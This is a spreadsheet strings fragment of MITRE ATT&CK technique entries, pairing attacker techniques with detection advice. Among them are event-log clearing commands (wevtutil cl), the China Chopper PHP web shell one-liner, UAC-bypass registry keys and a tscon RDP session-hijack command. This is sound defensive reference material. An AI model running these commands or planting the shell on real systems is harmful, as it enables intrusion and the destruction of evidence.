  <si>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Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)</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</si>
  <si>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
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macos being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit),  (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>defense-evasion,execution</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</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</si>
  <si>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</si>
  <si>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[Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>API monitoring,MBR,VBR</t>
  </si>
  <si>
    <t>Linux,Windows</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
### Master Boot Record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 Volume Boot Record
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,Application logs</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</si>
  <si>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or evidence of Discovery.
Higher privileges are often necessary to perform additional actions such as some methods of [Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>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may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.</t>
  </si>
  <si>
    <t>privilege-escalation</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings. 
### Windows
Examples of commands that can list groups are &lt;code&gt;net group /domain&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; using the [Net](https://attack.mitre.org/software/S0039) utility.
### Mac
On Mac, this same thing can be accomplished with the &lt;code&gt;dscacheutil -q group&lt;/code&gt; for the domain, or &lt;code&gt;dscl . -list /Groups&lt;/code&gt; for local groups.
### Linux
On Linux, local groups can be enumerated with the &lt;code&gt;groups&lt;/code&gt; command and domain groups via the &lt;code&gt;ldapsearch&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. For example, deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1086) (Citation: Microsoft Clear-EventLog)) may generate an alterable event (Event ID 1102: "The audit log was cleared"). Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* .
Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
### Clear Windows Event Logs
Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security.
Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Standard Application Layer Protocol</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</si>
  <si>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(Citation: University of Birmingham C2)</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</si>
  <si>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</si>
  <si>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Third-party Software</t>
  </si>
  <si>
    <t>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
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</si>
  <si>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DLL Side-Loading</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs</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</si>
  <si>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t>
  </si>
  <si>
    <t>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.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Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).
Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</t>
  </si>
  <si>
    <t>Pass the Hash</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</si>
  <si>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</si>
  <si>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 (Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring</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</si>
  <si>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
Also, set up process monitoring for &lt;code&gt;tscon.exe&lt;/code&gt; usage and monitor service creation that uses &lt;code&gt;cmd.exe /k&lt;/code&gt; or &lt;code&gt;cmd.exe /c&lt;/code&gt; in its arguments to prevent RDP session hijacking.</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</si>
  <si>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(Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.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Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)
Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, &lt;code&gt;c:\windows\system32\tscon.exe [session number to be stolen]&lt;/code&gt;, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: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RedSnarf. (Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.</t>
  </si>
  <si>
    <t>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include &lt;code&gt;C$&lt;/code&gt;, &lt;code&gt;ADMIN$&lt;/code&gt;, and &lt;code&gt;IPC$&lt;/code&gt;. 
Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using &lt;code&gt;net use&lt;/code&gt; commands with valid credentials. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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t>
  </si>
  <si>
    <t>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. 
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Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful. 
The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation,initial-access</t>
  </si>
  <si>
    <t>Multilayer Encryption</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses [Standard Cryptographic Protocol](https://attack.mitre.org/techniques/T1032), SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks) After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.
With [Custom Cryptographic Protocol](https://attack.mitre.org/techniques/T1024), if malware uses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</si>
  <si>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An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</t>
  </si>
  <si>
    <t>Taint Shared Content</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</si>
  <si>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
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</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</si>
  <si>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Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158).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t>
  </si>
  <si>
    <t>Credentials in Files</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters</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</si>
  <si>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</si>
  <si>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[Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
### Windows
Example commands and utilities that obtain this information include &lt;code&gt;ver&lt;/code&gt;, [Systeminfo](https://attack.mitre.org/software/S0096), and &lt;code&gt;dir&lt;/code&gt; within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories.
### Mac
On Mac, the &lt;code&gt;systemsetup&lt;/code&gt; command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the &lt;code&gt;system_profiler&lt;/code&gt; gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>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</si>
  <si>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enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. 
### Windows
Example utilities used to obtain this information are &lt;code&gt;dir&lt;/code&gt; and &lt;code&gt;tree&lt;/code&gt;. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.
### Mac and Linux
In Mac and Linux, this kind of discovery is accomplished with the &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt; commands.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)</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</si>
  <si>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(Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</t>
  </si>
  <si>
    <t>Rundll32</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</si>
  <si>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</si>
  <si>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
Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also been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t>
  </si>
  <si>
    <t>PowerShell</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</si>
  <si>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It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)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PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts. 
### Windows
Example commands that can acquire this information are &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net group &lt;groupname&gt;&lt;/code&gt;, and &lt;code&gt;net localgroup &lt;groupname&gt;&lt;/code&gt; using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.
### Mac
On Mac, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.
### Linux
On Linux, local users can be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file which is world readable. In mac, this same file is only used in single-user mode in addition to the &lt;code&gt;/etc/master.passwd&lt;/code&gt; file.
Also, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands.</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Authentication logs,Process command-line parameters</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</si>
  <si>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[Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key. (Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</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</si>
  <si>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 (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: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lateral systems and default to high integrity. (Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>Disabling Security Tools</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.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</si>
  <si>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</si>
  <si>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Connection Proxy</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
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</si>
  <si>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 connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)
The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
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t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention</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</si>
  <si>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</si>
  <si>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</si>
  <si>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lateral-movement,initial-access</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</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</si>
  <si>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</si>
  <si>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Process Hollowing</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls that unmap process memory, such as ZwUnmapViewOfSection or NtUnmapViewOfSection, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.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Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Standard Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: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 Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>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</si>
  <si>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Pass the Ticket</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.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 (Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by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 (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)
Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)
Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,Windows event logs,Packet capture</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)
Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.</t>
  </si>
  <si>
    <t>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These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>credential-access,persistence</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</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</si>
  <si>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 (Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106)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 (Citation: US-CERT Alert TA15-314A Web Shells)</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</si>
  <si>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 (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys.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 (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</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</si>
  <si>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
 (Citation: Graeber 2014)</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</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</si>
  <si>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(e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
These commands may also include pointers to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</si>
  <si>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command-and-control,defense-evasion</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns)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</si>
  <si>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Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs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Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Remote File Copy</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP,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</si>
  <si>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[FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
